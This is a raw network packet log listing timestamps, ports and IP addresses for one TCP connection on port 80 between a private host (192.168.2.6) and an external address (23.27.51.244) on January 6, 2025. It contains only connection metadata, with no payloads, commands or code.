Jan 6, 2025 06:03:59.357624054 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.357624054 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.357624054 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.357670069 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.357678890 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357692003 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357702017 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357713938 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357722044 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.357742071 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.357749939 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357765913 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.357780933 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.357824087 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357835054 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357845068 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357855082 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357867002 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357872963 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.357898951 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.357945919 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.357978106 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357989073 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358000040 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358010054 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358023882 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.358053923 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.358129025 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358139992 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358150005 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358160973 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358182907 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.358208895 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.358298063 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358309031 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358325005 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358335972 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358345985 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358351946 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.358355999 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358367920 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358374119 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.358377934 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358388901 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358393908 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.358400106 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358431101 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.358431101 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.358462095 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.358822107 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358831882 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358848095 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358858109 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358869076 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358877897 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.358879089 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358895063 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358902931 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.358906031 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358916998 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358920097 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.358932018 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.358948946 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.358966112 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.359102964 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359117985 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359127998 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359138012 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359148026 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359149933 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.359158039 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359165907 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.359168053 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359206915 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.359208107 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.359440088 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359457016 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359467030 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359477043 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359486103 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.359493017 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359503031 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359507084 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.359513998 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359524965 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359525919 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.359534979 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359544039 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359554052 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359565020 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359565973 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.359565973 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.359575033 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359585047 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359591007 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.359595060 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359605074 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359610081 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.359616995 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359625101 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.359647989 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.359666109 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.359975100 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359986067 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.359996080 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360008001 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360019922 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360033035 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360044003 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360054016 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360063076 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360068083 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360068083 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360073090 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360084057 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360095024 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360096931 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360105038 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360111952 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360116959 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360126972 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360136032 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360137939 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360156059 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360177994 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360485077 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360496044 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360506058 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360517979 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360528946 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360538006 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360538006 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360565901 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360595942 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360774040 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360784054 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360795021 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360804081 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360814095 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360824108 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360824108 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360833883 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360842943 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360847950 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360858917 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360858917 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360865116 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360874891 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360884905 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360892057 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360896111 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360905886 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360915899 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360922098 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360924006 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360934019 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360941887 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360941887 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360944033 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360955000 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360965014 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360974073 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360979080 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.360984087 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.360997915 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.361016035 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.448021889 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448039055 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448056936 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448067904 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448120117 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448129892 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448128939 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.448143959 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448184967 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.448249102 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448261976 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448271990 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448283911 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448317051 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.448317051 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.448348999 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.448410034 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448420048 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448430061 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448438883 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448448896 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448455095 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.448460102 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448468924 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448472023 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.448522091 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.448582888 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448595047 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448604107 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448613882 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448625088 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448628902 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.448635101 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448646069 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.448651075 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448673964 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.448703051 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.448730946 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448749065 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448759079 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448784113 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.448808908 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.448950052 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448961020 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448971987 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448982000 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448992968 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.448997021 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.449003935 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449014902 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449023962 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449028015 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.449034929 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449043036 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.449045897 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449063063 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.449081898 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.449111938 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.449208021 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449218035 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449254990 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.449361086 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449371099 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449379921 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449392080 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449400902 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.449403048 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449414015 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449424982 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449435949 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449448109 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.449448109 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.449485064 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.449485064 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.449672937 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449683905 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449692965 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449703932 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449713945 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449722052 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.449729919 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449740887 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449748993 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.449750900 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449764013 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449778080 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.449795961 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.449975967 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449985981 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.449996948 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450006962 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450016975 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450021029 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.450026989 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450042963 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.450043917 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450054884 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450062990 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.450064898 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450077057 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450081110 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.450086117 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450103998 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450109005 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.450114965 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450124979 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450134993 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.450135946 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450153112 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.450189114 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.450603008 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450613976 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450623989 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450634003 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450644016 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450644970 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.450654984 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450665951 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450670958 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.450680971 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450691938 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450690985 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.450701952 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450711012 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450715065 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.450721025 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450731039 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450737000 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.450742006 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.450778008 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.450797081 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.451052904 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451062918 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451071978 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451081991 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451097012 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.451098919 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451109886 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451121092 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451131105 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.451131105 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451142073 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451150894 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451152086 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.451160908 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451170921 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.451189041 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.451212883 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.451399088 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451410055 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451421022 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451431990 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451437950 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.451442003 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451474905 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.451474905 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.451504946 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.451587915 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451600075 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451610088 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451622009 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451631069 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451638937 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.451641083 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451652050 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451658010 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.451662064 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451673985 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451683044 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451685905 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.451694012 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451704025 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451711893 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.451714993 CET	80	49709	23.27.51.244	192.168.2.6
